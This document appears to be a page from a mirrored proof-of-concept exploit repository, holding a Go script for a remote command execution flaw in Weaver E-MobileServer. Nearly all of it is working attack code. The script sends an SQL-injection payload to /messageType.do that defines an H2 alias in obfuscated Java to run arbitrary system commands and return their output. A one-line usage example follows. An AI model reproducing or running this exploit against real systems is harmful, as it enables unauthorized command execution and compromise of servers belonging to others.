admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-08-13 11:26:39 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/泛微OA/泛微E-MobileServer远程命令执行漏洞.md

74 lines
3.3 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
## 泛微E-MobileServer远程命令执行漏洞
## go语言 poc
```go
package main
import (
"bytes"
"fmt"
"github.com/hpifu/go-kit/hflag"
"io/ioutil"
"mime/multipart"
"net/http"
"net/url"
"os"
"strings"
)
func main() {
t, c := getParam()
exploit(t, c)
}
func exploit(host, command string) {
p := "1';CREATE ALIAS if not exists MzSNqKsZTagm AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass(\"com.caucho.server.dispatch.ServletInvocation\").getMet','hod(\"getContextRequest\").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField(\"_response\");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod(\"getWriter\");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter(\"\\\\A\");writer.write(scan','ner.hasNext()?sca','nner.next():\"\");}');CALL MzSNqKsZTagm('" + url.QueryEscape(command) + "');--"
c := http.Client{}
buffer := &bytes.Buffer{}
writer := multipart.NewWriter(buffer)
field, _ := writer.CreateFormField("method")
field.Write([]byte("create"))
formField, _ := writer.CreateFormField("typeName")
formField.Write([]byte(p))
_ = writer.Close()
target := strings.Replace(host+"/messageType.do", "//mess", "/mess", 1)
request, _ := http.NewRequest(http.MethodPost, target, strings.NewReader(buffer.String()))
request.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36")
request.Header.Set("Accept", "*/*")
request.Header.Set("Connection", "close")
request.Header.Set("Content-Type", writer.FormDataContentType())
request.Header.Set("Content-Length", "1142")
request.Header.Set("Accept-Encoding", "")
do, err := c.Do(request)
if err != nil {
fmt.Println(err)
}
defer func() {
_ = do.Body.Close()
}()
all, err := ioutil.ReadAll(do.Body)
if err != nil {
fmt.Println(err)
}
if string(all) == "{\"status\":false}" {
fmt.Println("无效的命令,也许是服务器不支持或其他情况")
return
}
result := strings.Replace(fmt.Sprintf("%s", all), "{\"status\":false,\"ID\":\"1\",\"msg\":\"推送类型已存在\"}", "", -1)
fmt.Println("\n", result)
}
func getParam() (t, c string) {
hflag.AddFlag("target", "泛微E-MobileServer-地址", hflag.Required(), hflag.Shorthand("t"))
hflag.AddFlag("command", "待执行的系统命令", hflag.Required(), hflag.Shorthand("c"))
if err := hflag.Parse(); err != nil {
fmt.Println(hflag.Usage())
os.Exit(0)
}
return hflag.GetString("target"), hflag.GetString("command")
}
```
## poc使用
```go run poc.go -t http://目标 -c 执行命令```
Reference in New Issue Copy Permalink